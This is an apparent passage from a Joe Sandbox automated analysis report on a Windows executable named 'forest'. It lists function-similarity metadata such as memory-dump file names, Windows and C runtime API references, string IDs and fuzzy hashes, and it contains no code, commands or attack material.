    • Instruction Fuzzy Hash: 8D51962690878686E766AF2DD4D067DBBD0AF15B44FCD8031CA8C073E6DE2EA855C721
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _set_statfp
    • String ID:
    • API String ID: 1156100317-0
    • Opcode ID: b5f862fb55466f104c7638c26c27eae1ccad5020b215a080a91550ad010d465e
    • Instruction ID: 531d3bf0c95d07ebf49f9e2ede976f46779ebde9bf25e753653ac3faf342b2ce
    • Opcode Fuzzy Hash: b5f862fb55466f104c7638c26c27eae1ccad5020b215a080a91550ad010d465e
    • Instruction Fuzzy Hash: 10113A22E98B4301F66C372CE5663FD95406F59374F8D4634EA6E563F68E5CB8825230
    APIs
    • FlsGetValue.KERNEL32(?,?,?,00007FF75BD53B53,?,?,00000000,00007FF75BD53DEE,?,?,?,?,8000000000000000,00007FF75BD53D7A), ref: 00007FF75BD5E44F
    • FlsSetValue.KERNEL32(?,?,?,00007FF75BD53B53,?,?,00000000,00007FF75BD53DEE,?,?,?,?,8000000000000000,00007FF75BD53D7A), ref: 00007FF75BD5E46E
    • FlsSetValue.KERNEL32(?,?,?,00007FF75BD53B53,?,?,00000000,00007FF75BD53DEE,?,?,?,?,8000000000000000,00007FF75BD53D7A), ref: 00007FF75BD5E496
    • FlsSetValue.KERNEL32(?,?,?,00007FF75BD53B53,?,?,00000000,00007FF75BD53DEE,?,?,?,?,8000000000000000,00007FF75BD53D7A), ref: 00007FF75BD5E4A7
    • FlsSetValue.KERNEL32(?,?,?,00007FF75BD53B53,?,?,00000000,00007FF75BD53DEE,?,?,?,?,8000000000000000,00007FF75BD53D7A), ref: 00007FF75BD5E4B8
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Value
    • String ID:
    • API String ID: 3702945584-0
    • Opcode ID: c1f80a57214fa9314f74c4b30dc64759b56f05021f72730d0f25618e90a88899
    • Instruction ID: 93250cf76c36ce2d1f7200d05cd071f1d20acb207dc47727781dc9edfa5c1a32
    • Opcode Fuzzy Hash: c1f80a57214fa9314f74c4b30dc64759b56f05021f72730d0f25618e90a88899
    • Instruction Fuzzy Hash: 43114C20E0D74342FA6DB72E66D2579E2426F843B0F8C4334E83E066F6DE2CF4418221
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Value
    • String ID:
    • API String ID: 3702945584-0
    • Opcode ID: 664d4be6e4d57da178c0bd4b1e2dd36a93d6030a558b2ea56983ac91fc98f45f
    • Instruction ID: 1fe472a351131131db9485dd230c66f075a4f2745e832f3c96fd1c773556f965
    • Opcode Fuzzy Hash: 664d4be6e4d57da178c0bd4b1e2dd36a93d6030a558b2ea56983ac91fc98f45f
    • Instruction Fuzzy Hash: 5611D324A0974746FA7D773E58D2579E1816F85364EDC0B74E93E0A2F2DD2CB4414231
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: CallEncodePointerTranslator
    • String ID: MOC$RCC
    • API String ID: 3544855599-2084237596
    • Opcode ID: 4570207b4165d0635ac4a3fd3d64531da63560077cbea117cab5ba90e919dedc
    • Instruction ID: 2bd2392a12e339231b72637a8fecad332a07c8768051d99f8bc32411ec13a008
    • Opcode Fuzzy Hash: 4570207b4165d0635ac4a3fd3d64531da63560077cbea117cab5ba90e919dedc
    • Instruction Fuzzy Hash: 8691AF73E08B818AE714EF69E8402BDBBA0FB44788F584179EA8D17765DF78D195CB00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: {"msg":"
    • API String ID: 3668304517-2882747944
    • Opcode ID: 5d06d9a251fd8b4a576a19a10e83e4d40e5508396f1b958b033d9f2b6b30e06f
    • Instruction ID: 1bbf796db22b4e4b766acbc3e4550860d800c84cd20bba136983808831dd7874
    • Opcode Fuzzy Hash: 5d06d9a251fd8b4a576a19a10e83e4d40e5508396f1b958b033d9f2b6b30e06f
    • Instruction Fuzzy Hash: 6551C262B14B4595FB04AB29D0403BDA361EB457B8F884731EE6C17BEAEF7CD5428360
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
    • String ID: csm
    • API String ID: 2395640692-1018135373
    • Opcode ID: 96d482e54c2ff74a9578f97a2d3b0353fcb5dd65390cdded8450e2fed95d9ab2
    • Instruction ID: 0f6aa59a2b24a25568cd202f0b964c4062e6dbde46debc98b29632caea4eb8c6
    • Opcode Fuzzy Hash: 96d482e54c2ff74a9578f97a2d3b0353fcb5dd65390cdded8450e2fed95d9ab2
    • Instruction Fuzzy Hash: 4C51FB32F1A7428ADB5CEB19E404A7CB3A1EB44B98F994174EA4E43794DFBDE841C710
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
    • String ID: csm$csm
    • API String ID: 3896166516-3733052814
    • Opcode ID: 56963d72e84833e31defc41a0a330777e341b24c38b4c4f77a0b573189b86a8c
    • Instruction ID: 94daacf8cd9a9f0ebaeae0a8c46eafc8fe5cb17753b116fb0f702aa5fa2d79ce
    • Opcode Fuzzy Hash: 56963d72e84833e31defc41a0a330777e341b24c38b4c4f77a0b573189b86a8c
    • Instruction Fuzzy Hash: B151B132D083428AEB68AF1A9544378B7A0FB44B85F9C4175DA5C47BE5CFBDE450C710
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
    • String ID: bad locale name
    • API String ID: 2775327233-1405518554
    • Opcode ID: 3931c185ac249372042b0835e728ec539ad978b651a92cbfb8180ec839c4395c
    • Instruction ID: ff88319507f65e803770574d03b1e829b220c5ff24e2ded1fb6259a624bbc6a5
    • Opcode Fuzzy Hash: 3931c185ac249372042b0835e728ec539ad978b651a92cbfb8180ec839c4395c
    • Instruction Fuzzy Hash: 7D517D32B09B418AEB18EF74D4503BCB3A4EF84748F484135EE4D26AAADF389565D394
    APIs
    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF75BD65000), ref: 00007FF75BD65183
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF75BD65000), ref: 00007FF75BD6520D
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ConsoleErrorLastMode
    • String ID:
    • API String ID: 953036326-0
    • Opcode ID: b24a8eab074577c162c6cdbd7e1523746b621e7fdef98cc78988dc972daca678
    • Instruction ID: 0da57a2cbe463ed741fbb8d07832b530d5b86397e750ed0eb50b6e85c21cd15b
    • Opcode Fuzzy Hash: b24a8eab074577c162c6cdbd7e1523746b621e7fdef98cc78988dc972daca678
    • Instruction Fuzzy Hash: E691C572E18B9A85F758AF6994403BDA7A0FB48BDCF880135DE0E576A4DF39D481C720
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo$_get_daylight
    • String ID:
    • API String ID: 72036449-0
    • Opcode ID: 6ee7f3f5d77d3d1bc48d53be37883cc5b81d2d73ff0743d23d12e10b1a6c0d1e
    • Instruction ID: 28fafcebb92dd636945c1227581a043e2f175a79c3f651c4e48c306c33b9d674
    • Opcode Fuzzy Hash: 6ee7f3f5d77d3d1bc48d53be37883cc5b81d2d73ff0743d23d12e10b1a6c0d1e
    • Instruction Fuzzy Hash: 7551B133E0CB8286F76C6F2C9646379E680EB48714F9D4035DA4E862F9DE7DE8408635
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
    • String ID:
    • API String ID: 2138705365-0
    • Opcode ID: 99f64ae422d88bbc2f057324fc91095b6e10ec305a95e6e6fa384474f419613d
    • Instruction ID: 68ae7c6bbc457758e913df7c850dd8dd632d1c69895db4a00043316485828bc3
    • Opcode Fuzzy Hash: 99f64ae422d88bbc2f057324fc91095b6e10ec305a95e6e6fa384474f419613d
    • Instruction Fuzzy Hash: B7511C62E18BC181EB149B28E0513B9E361FB89794F849331EA9D067A6EF7CE0C5C710
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
    • String ID:
    • API String ID: 2780335769-0
    • Opcode ID: 3b67d254175e1356448e30113c7945dcc594d42a4af4fb0ebecbdf82148d1320
    • Instruction ID: 3525ed563404d550621fc691c438006958f74cbf46ef73d445f802471ff2291c
    • Opcode Fuzzy Hash: 3b67d254175e1356448e30113c7945dcc594d42a4af4fb0ebecbdf82148d1320
    • Instruction Fuzzy Hash: 3D517062E047418AFB18EF79D4903BDA7A1AB48B48FA94535DE0D476A8EF38D481C720
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID:
    • API String ID: 3215553584-0
    • Opcode ID: aa8d8d6ef9abf4a7f6b39118007aba560a03b250cad3e0274fea527eecee2a0e
    • Instruction ID: d5f04442da85210bc142f53c9da81a1e857e118c51bcd09d151160f4bfb69a34
    • Opcode Fuzzy Hash: aa8d8d6ef9abf4a7f6b39118007aba560a03b250cad3e0274fea527eecee2a0e
    • Instruction Fuzzy Hash: DF41B6369097C685E757EF29D89037DBB94AB05B88F8C8031DA8D077E6DE3D9451C322
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
    • String ID:
    • API String ID: 1279662727-0
    • Opcode ID: e4876973aa477c234093ca3bb4f84cb558b2507fe2f53346e19c8feeadb19f6c
    • Instruction ID: 812af9e59fd4b0d8d719234f491fc567fca9ade04eb77bce80d8a3ada3a3405d
    • Opcode Fuzzy Hash: e4876973aa477c234093ca3bb4f84cb558b2507fe2f53346e19c8feeadb19f6c
    • Instruction Fuzzy Hash: 5B41A832D1878243F718AB6595503B9B260FF957A4F649335D69C03AE1EF7CA5E08720
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
    • String ID:
    • API String ID: 2933794660-0
    • Opcode ID: b9e1cb826040695ffc2e6f4ebf7601d3e39c2bda59bc6187a4fd1e2310153cf5
    • Instruction ID: 02f84302f6c14f275865d5c59b71ce75d02727355205b9f4523bce0e8a5c1e42
    • Opcode Fuzzy Hash: b9e1cb826040695ffc2e6f4ebf7601d3e39c2bda59bc6187a4fd1e2310153cf5
    • Instruction Fuzzy Hash: E0112A26B14F018AEB04DF74E8542B873A4FB19758F880E31EA6D867A4EF7CD168C350
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID: invalid stoull argument
    • API String ID: 0-2058699613
    • Opcode ID: eaed5e95d4f30143368ef6ed9d0a8950138a867b4e377591b662461e9a27bce8
    • Instruction ID: 7fa18fb0e9fc53bcc8cf0958eca28106a9bdf6884a693bcefe6b571f3d1b8296
    • Opcode Fuzzy Hash: eaed5e95d4f30143368ef6ed9d0a8950138a867b4e377591b662461e9a27bce8
    • Instruction Fuzzy Hash: 1F71D232A08B8582DB14EF19E4802BEB7A4FB85784F958036EA8D47775EF3CE444CB40
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: __except_validate_context_record
    • String ID: csm$csm
    • API String ID: 1467352782-3733052814
    • Opcode ID: 0aab2139d8ff1db06bd9a7db1baed0bb2163b038a6bcbeb200c170c991ea75bc
    • Instruction ID: 14f2dd03147b914f1650cc03691375ea09fa8d836a31d04c621c9aa8b7a769dd
    • Opcode Fuzzy Hash: 0aab2139d8ff1db06bd9a7db1baed0bb2163b038a6bcbeb200c170c991ea75bc
    • Instruction Fuzzy Hash: E671D572D087828ADB68AF1AD4847B9FB90FB15B84F988275EE8C076A5CF7CD451C710
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
